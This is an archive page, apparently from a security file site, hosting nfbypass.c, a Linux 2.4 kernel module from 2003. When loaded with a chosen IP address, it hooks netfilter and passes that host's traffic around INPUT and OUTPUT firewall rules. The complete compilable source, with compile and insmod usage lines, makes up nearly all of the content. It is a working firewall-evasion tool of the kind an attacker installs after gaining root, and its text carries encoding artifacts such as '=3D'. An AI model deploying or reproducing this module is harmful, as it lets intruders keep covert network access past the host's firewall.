nfbypass.c

nfbypass.c: Posted Apr 2, 2003; Authored by truff | Site projet7.org; nfbypass is a Linux kernel module for the 2.4.x series which, when inserted, will bypass netfilter rules.; tags | kernel; systems | linux; SHA-256 | c92278ac9f69f9e3fce669b4bdaf7609692c9cd2074111ab285fc98a64dc7c63; Download | Favorite | View

nfbypass.c

/********************************************************\
 * nfbypass.c                                           *
 * By truff (truff@projet7.org)                         *
 *                                                      *
 * Linux 2.4.x lkm to bypass netfilter INPUT and        *
 * OUTPUT rulez                                         *
 *                                                      *
 * Compil: gcc -O2 -c nfbypass.c                        *
 * Usage : insmod nfbypass.o my_ip=3D"xxx.xxx.xxx.xxx"    *
 *                                                      *
 * Greetz to #root people and projet7 members @#!%      *
 *                                                      *
 *   www.projet7.org           - Security Researchs -   *
\********************************************************/

#define MODULE
#define __KERNEL__


#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/netfilter_ipv4.h>
#include <linux/netfilter_ipv4/ip_tables.h>


u_int32_t my_inet_addr (u_char *address);


static u_char *my_ip =3D NULL;
static u_int32_t my_address;=20
MODULE_PARM (my_ip, "s");

static unsigned int my_hook (unsigned int hook,=20
    struct sk_buff **pskb,=20
    const struct net_device *indev,=20
    const struct net_device *outdev,=20
    int (*okfn)(struct sk_buff *))
{
  struct iphdr  *ip;

  ip =3D (struct iphdr *) ((*pskb)->nh.iph);
 =20
  if (((hook =3D=3D NF_IP_LOCAL_IN) && (ip->saddr =3D=3D my_address)) ||
      ((hook =3D=3D NF_IP_LOCAL_OUT)&& (ip->daddr =3D=3D my_address)))
  {
    /*
     * OK, we Jump over Netfilter :)
     */
    okfn (*pskb);
    return NF_STOLEN;
  }
  else=20
    return NF_ACCEPT;
}

static struct nf_hook_ops in_ops =3D {
  {NULL, NULL}, my_hook, PF_INET, 0, NF_IP_PRI_FILTER-1
};

static struct nf_hook_ops out_ops =3D {
  {NULL, NULL}, my_hook, PF_INET, 0, NF_IP_PRI_FILTER-1
};

int init_module (void)
{
  my_address =3D my_inet_addr (my_ip);
 =20
  in_ops.hooknum =3D NF_IP_LOCAL_IN;
  nf_register_hook (&in_ops);

  out_ops.hooknum =3D NF_IP_LOCAL_OUT;
  nf_register_hook (&out_ops);
 =20
  return 0;
}


void cleanup_module (void)
{
  nf_unregister_hook(&in_ops);
  nf_unregister_hook(&out_ops);
}


u_int32_t my_inet_addr (u_char *address)
{
  u_int32_t u1, u2, u3, u4;
  u_int32_t ip;
  char *ptr;

  if (address =3D=3D NULL)
    return -1;

  u1 =3D simple_strtoul (address, &ptr, 10);
  u2 =3D simple_strtoul (ptr+1, &ptr, 10);
  u3 =3D simple_strtoul (ptr+1, &ptr, 10);
  u4 =3D simple_strtoul (ptr+1, &ptr, 10);
 =20
  ip =3D u4<<24 | u3<<16 | u2<<8 | u1;

  return ip;
}

Top Authors In Last 30 Days

Red Hat 216 files
Ubuntu 78 files
indoushka 77 files
Jasper Nota 25 files
Gentoo 22 files
Willem Westerhof 19 files
Debian 18 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,096)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,553)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,689)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,482)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,736)
UNIX (9,435)
UnixWare (187)
Windows (6,671)
Other

nfbypass.c

nfbypass.c

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

nfbypass.c

Share This

nfbypass.c

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems